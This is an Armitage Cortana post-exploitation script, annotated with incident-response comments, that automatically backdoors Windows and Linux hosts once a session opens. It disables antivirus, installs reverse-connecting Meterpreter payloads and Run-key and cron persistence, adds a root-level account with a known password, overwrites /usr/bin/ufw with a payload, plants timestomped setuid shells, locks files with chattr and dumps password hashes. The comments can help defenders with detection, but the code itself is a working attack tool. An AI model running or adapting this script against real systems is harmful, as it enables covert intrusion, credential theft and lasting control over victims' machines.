  1. # Script to install/hide a few shells/accounts
  2. # To Do
  3. # Add dns server
  4. # Update hosts file with fake entries to break patching (evil grade?)
  5. # Author: __int128
  # Cortana (Sleep-based Armitage scripting) post-exploitation script. The comments
  # added below read it from the incident-response side: they name the host
  # artifacts (files, accounts, cron/registry entries) the visible lines create.
  6. global('%infected');     # hash keyed by session_host(); set to "1" once a host has been processed
  7. $win_user = 'lls_USER';  # hard-coded account name; recorded via `creds --add` for ports 3389 and 23
  8. $win_pass = '@pplesauc3';
  9. $local_ip = lhost();     # Armitage-side host, passed as -r to `run persistence`
  10.  
  # Runs for every new session; branches on host_os() and is skipped for hosts
  # already marked in %infected. Artifacts written, for detection/triage:
  # Windows: metsvc service with bind port 31337; a random 5-letter .exe in
  #   c:\Windows\System32; c:\Windows\linkinfo.dll; Run-key value "update" under
  #   HKLM\software\Microsoft\Windows\CurrentVersion\Run; `run persistence`
  #   (60 s callback); RDP and telnet enabled via getgui/gettelnet.
  # Linux: key appended to /root/.ssh/authorized_keys; uid-0 "administrator"
  #   entries appended to /etc/passwd and /etc/shadow; /etc/cron.5min/dpkg plus
  #   lines in /etc/crontab and /var/spool/cron/crontabs/root; /usr/bin/ufw
  #   overwritten and launched from /etc/profile and /etc/skel/.profile; setuid
  #   shell copies /.kernel and /tmp/X11.auth with backdated mtime; chattr +i on
  #   several of these paths (immutable flag must be cleared before cleanup).
  11. on session_open {
  12. $rhost = session_host($1);
  13. if (%infected[session_host($1)] != "1") {    # one pass per host
  14. if (host_os(session_host($1)) eq "Microsoft Windows") {
  15. if(-isshell $1) {
  16. cmd_async("sessions -u $1");    # plain shell: ask Metasploit to upgrade it, Meterpreter branch handles the rest
  17. }
  18. if(-iswinmeterpreter $1) {
  19. say("Infecting " . session_host($1));
  20. m_cmd($1, "getsystem");
  21. m_cmd($1, "run killav");
  22. m_cmd($1, "run metsvc");    # installs the metsvc service; listener below expects it on 31337
  23. handler("windows/metsvc_bind_tcp", "31337", %(LHOST => lhost(), RHOST => $rhost));
  24.  
  25. $r_lport = random_port();
  26. # Generate Payload(s)
  # @alphabet is not defined in this file — presumably a global provided by the environment.
  27. $r_backdoor = rand(@alphabet) . rand(@alphabet) . rand(@alphabet) . rand(@alphabet) . rand(@alphabet) . ".exe";
  28. $win_backdoor = generate("windows/meterpreter/reverse_tcp_allports", lhost(), $r_lport, %(), "exe");
  29. $handle = openf(">/tmp/$r_backdoor");    # staged locally under /tmp before upload
  30. writeb($handle, $win_backdoor);
  31. closef($handle);
  32. handler("windows/meterpreter/reverse_tcp_allports", $r_lport, %(ExitOnSession => "false", LHOST => lhost()));
  33.  
  34. $r_lport = random_port();
  35. $win2_backdoor = generate("windows/meterpreter/reverse_tcp_allports", lhost(), $r_lport, %(), "dll");
  36. $handle = openf(">/tmp/linkinfo.dll");
  37. writeb($handle, $win2_backdoor);
  38. closef($handle);
  39. handler("windows/meterpreter/reverse_tcp_allports", $r_lport, %(ExitOnSession => "false", LHOST => lhost()));
  40. m_cd($1, 'c:\Windows\System32');    # destination for the random-named .exe
  41. m_upload($1, "/tmp/$r_backdoor)");
  42. m_cd($1, 'c:\Windows');             # destination for linkinfo.dll
  43. m_upload($1, "/tmp/linkinfo.dll");
  # Autostart via HKLM Run key; the value name is "update".
  44. m_cmd($1, "reg setval -k HKLM\\\\software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run -v update -d \"c:\\\\Windows\\\\System32\\\\update.exe\"");
  45.  
  46. $r_lport = random_port();
  47. m_cmd($1, "run persistence -X -i 60 -p $r_lport -r $local_ip");    # -X: boot-time start, -i 60: retry every 60 s
  48. handler("windows/meterpreter/reverse_tcp", $r_lport, %(ExitOnSession => "false", LHOST => lhost()));
  49.  
  # $backdoor_user / $backdoor_pass are not assigned anywhere in this file.
  50. m_cmd($1, "run getgui -u $backdoor_user -p $backdoor_pass");
  51. m_cmd($1, "run gettelnet -u $backdoor_user -p $backdoor_pass");
  52. $rdp = "creds --add " . session_host($1) . " -p 3389 -u $win_user -P $win_pass";    # record RDP creds in the Metasploit DB
  53. cmd_async($rdp);
  54. $tel = "creds --add " . session_host($1) . " -p 23 -u $win_user -P $win_pass";      # record telnet creds
  55. cmd_async($tel);
  56.  
  57. %infected[session_host($1)] = "1";
  58. m_cmd($1, "run hashdump");
  59. }
  60. }
  61. else if (host_os(session_host($1)) eq "Linux") {
  62. if (-isshell $1) {
  63. say("Infecting " . session_host($1));
  64. s_cmd($1, "mkdir /root/.ssh");
  65. # on load prompt for keys or generate?
  # Public key read from the Armitage data directory and appended to root's authorized_keys.
  66. $handle = openf("/opt/metasploit/msf3/data/armitage/id_dsa.pub");
  67. $pub_key = readln($handle);
  68. s_cmd($1, "echo $pub_key >> /root/.ssh/authorized_keys");
  69. closef($handle);
  # Adds a uid-0 "administrator" account directly to /etc/shadow and /etc/passwd (no useradd).
  70. s_cmd($1, "echo 'administrator:\$6\$W6D9sKYe\$tPihBsmoYXNNBfDhmkT30tYqMdCtMN.zn9HpczbzVd0YMw9P5dAQnjQ4KqUN/4IG5xs4t1SUZP5k82vi5UWGc0:15578:0:99999:7:::' >> /etc/shadow"); # pass = abc123
  71. s_cmd($1, "echo 'administrator:x:0:0:nobody,,,,:/:/bin/bash' >>/etc/passwd");
  72. $ssh = "creds --add " . session_host($1) . " -p 22 -u administrator -P abc123";
  73. cmd_async($ssh);
  74.  
  75. # Generate Payload
  76. $r_lport = random_port();
  77. $r_backdoor = rand(@alphabet) . rand(@alphabet) . rand(@alphabet) . rand(@alphabet) . rand(@alphabet);
  78. $backdoor = generate("linux/x86/meterpreter/reverse_tcp", lhost(), $r_lport, %(), "elf");
  79. $handle2 = openf(">/tmp/$r_backdoor");
  80. writeb($handle2, $backdoor);
  81. closef($handle2);
  82.  
  83. # set cron job
  # New directory /etc/cron.5min, run every 5 minutes from both /etc/crontab and root's crontab;
  # the uploaded ELF is stored there as "dpkg" and made immutable.
  84. s_cmd($1, "mkdir /etc/cron.5min");
  85. s_cmd($1, "echo '*/5 * * * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.5min )' >> /etc/crontab");
  86. s_cmd($1, "echo '*/5 * * * * /etc/cron.5min/dpkg' >> /var/spool/cron/crontabs/root");
  87. s_cmd($1, "chmod 0600 /etc/crontab /etc/cron.5min /var/spool/cron/crontabs/root");
  88. shell_upload($1, "/tmp/$r_backdoor", "/etc/cron.5min/dpkg");
  89. s_cmd($1, "chmod 755 /etc/cron.5min/dpkg")
  90. s_cmd($1, "chattr +i /etc/cron.5min/dpkg");
  91.  
  92. # set profile
  # Same ELF written over /usr/bin/ufw and started in the background from login profiles.
  93. shell_upload($1, "/tmp/$r_backdoor", "/usr/bin/ufw");
  94. s_cmd($1, "chmod 775 /usr/bin/ufw");
  95. s_cmd($1, "echo '/usr/bin/ufw &' >>/etc/profile");
  96. s_cmd($1, "echo '/usr/bin/ufw &' >>/etc/skel/.profile");
  97. s_cmd($1, "chattr +i /usr/bin/ufw /etc/profile /etc/skel/.profile");
  98.  
  99. # Create Backup Shell
  # Setuid/setgid copies of zsh and tcsh with mtime set to 2004 (timestomped); find-by-mtime will miss them.
  100. s_cmd($1, "cp /bin/zsh /.kernel; chmod +sss /.kernel; touch -d '4 May 2004' /.kernel; chattr +i /.kernel");
  101. s_cmd($1, "cp /bin/tcsh /tmp/X11.auth; chmod +sss /tmp/X11.auth; touch -d '4 May 2004' /tmp/X11.auth");
  102.  
  103. %infected[session_host($1)] = "1";
  104.  
  105. # Launch our aux shells
  106. handler("linux/x86/meterpreter/reverse_tcp", $r_lport, %(ExitOnSession => "false", LHOST => lhost()));
  107. auxiliary("scanner/ssh/ssh_login_pubkey", @($rhost), %(USERNAME => 'root', KEY_FILE => '/opt/metasploit/msf3/data/armitage/id_dsa'));
  108. login("scanner/ssh/ssh_login", @($rhost), "administrator", "abc123", %(LHOST => lhost(), LPORT => random_port()));
  109.  
  110. # Get hashes
  111. launch("post", "linux/gather/hashdump", %(SESSION => "$1"));
  112. db_sync();
  113. }
  114. }
  115. else {
  116. say("Failed to infect " . session_host($1) . ":" . host_os(session_host($1)));    # any other OS is left alone
  117. }
  118. }
  119. }
  120.  
  # Context-menu entry shown only for hosts this script has already processed
  # (%infected == "1"). It reconnects using the artifacts installed above: the
  # metsvc bind listener on Windows, or stored password credentials over SSH on Linux.
  121. popup host_bottom {
  122. $rhost = $1;
  123. if (%infected[$1] == "1") {
  124. item "Re-establish connection" {
  125. if (host_os($1) eq "Microsoft Windows") {
  126. handler("windows/metsvc_bind_tcp", "31337", %(LHOST => lhost(), RHOST => $rhost));    # same port as in session_open
  127. }
  128. if (host_os($1) eq "Linux") {
  129. foreach $entry (credentials()) {    # every credential in the Metasploit DB, not only this host's
  130. %cred = $entry;
  131. if(%cred["ptype"] iswm "*password*") {    # skip hash/key credential types
  132. login("scanner/ssh/ssh_login", $rhost, %cred["user"], %cred["pass"], %(LHOST => lhost(), LPORT => random_port()));
  133. }
  134. }
  135. }
  136. }
  137. }
  138. }